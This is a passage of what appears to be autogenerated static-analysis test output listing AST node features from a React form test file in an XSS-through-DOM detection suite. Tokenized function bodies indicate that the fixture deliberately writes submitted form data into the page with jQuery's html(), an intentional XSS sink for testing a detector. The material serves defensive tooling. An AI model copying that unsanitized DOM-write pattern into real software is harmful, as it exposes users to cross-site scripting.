App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:40:62:44 | state | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:40:62:44 | state | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:40:62:44 | state | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:40:62:44 | state | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:46:62:50 | value | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:46:62:50 | value | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:46:62:50 | value | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:46:62:50 | value | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:46:62:50 | value | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:60 | onChange | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:60 | onChange | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:60 | onChange | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:60 | onChange | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:60 | onChange | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:53:62:80 | onChang ... Change} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:66 | this | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:66 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:66 | this | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:66 | this | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:66 | this | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:79 | this.handleChange | assignedToPropName | onChange | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:79 | this.handleChange | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:79 | this.handleChange | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:79 | this.handleChange | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:79 | this.handleChange | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:63:62:79 | this.handleChange | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:68:62:79 | handleChange | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:68:62:79 | handleChange | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:68:62:79 | handleChange | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:68:62:79 | handleChange | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:68:62:79 | handleChange | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:84:63:8 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:84:63:8 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:84:63:8 | \\n | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:84:63:8 | \\n | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:84:63:8 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:9:63:46 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:9:63:46 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:63:9:63:46 | | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:9:63:46 | | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:9:63:46 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:10:63:14 | input | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:10:63:14 | input | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:63:10:63:14 | input | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:10:63:14 | input | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:10:63:14 | input | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:19 | type | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:19 | type | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:19 | type | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:19 | type | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:19 | type | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:16:63:28 | type="submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:21:63:28 | "submit" | assignedToPropName | type | +| autogenerated/Xss/XssThroughDom/forms.js:63:21:63:28 | "submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:21:63:28 | "submit" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:63:21:63:28 | "submit" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:21:63:28 | "submit" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:21:63:28 | "submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:34 | value | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:34 | value | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:34 | value | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:34 | value | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:34 | value | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:30:63:43 | value="Submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:36:63:43 | "Submit" | assignedToPropName | value | +| autogenerated/Xss/XssThroughDom/forms.js:63:36:63:43 | "Submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:36:63:43 | "Submit" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:63:36:63:43 | "Submit" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:36:63:43 | "Submit" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:36:63:43 | "Submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:63:47:64:4 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:63:47:64:4 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:63:47:64:4 | \\n | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:63:47:64:4 | \\n | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:63:47:64:4 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:67:1:67:42 | import ... -form'; | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:67:1:67:42 | import ... -form'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:67:1:67:42 | import ... -form'; | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:67:10:67:16 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:67:25:67:41 | 'react-hook-form' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:67:25:67:41 | 'react-hook-form' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:67:25:67:41 | 'react-hook-form' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | this | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | this | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | this | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | this | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | useForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | useForm | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | useForm | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:69:0 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | 'arguments' object of function HookForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | 'arguments' object of function HookForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | 'arguments' object of function HookForm | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | 'arguments' object of function HookForm | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | 'arguments' object of function HookForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | exceptional return of function HookForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | exceptional return of function HookForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | exceptional return of function HookForm | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | exceptional return of function HookForm | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | exceptional return of function HookForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | functio ... \\n );\\n} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | functio ... \\n );\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | functio ... \\n );\\n} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | return of function HookForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | return of function HookForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | return of function HookForm | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | return of function HookForm | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:69:1:81:1 | return of function HookForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:69:10:69:17 | HookForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:69:10:69:17 | HookForm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:69:10:69:17 | HookForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:42 | { regis ... rrors } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:42 | { regis ... rrors } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:42 | { regis ... rrors } | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:42 | { regis ... rrors } | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:42 | { regis ... rrors } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | handleSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | handleSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | register | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | register | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | register | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | { regis ... eForm() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | { regis ... eForm() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | { regis ... eForm() | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | { regis ... eForm() | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:9:70:54 | { regis ... eForm() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| 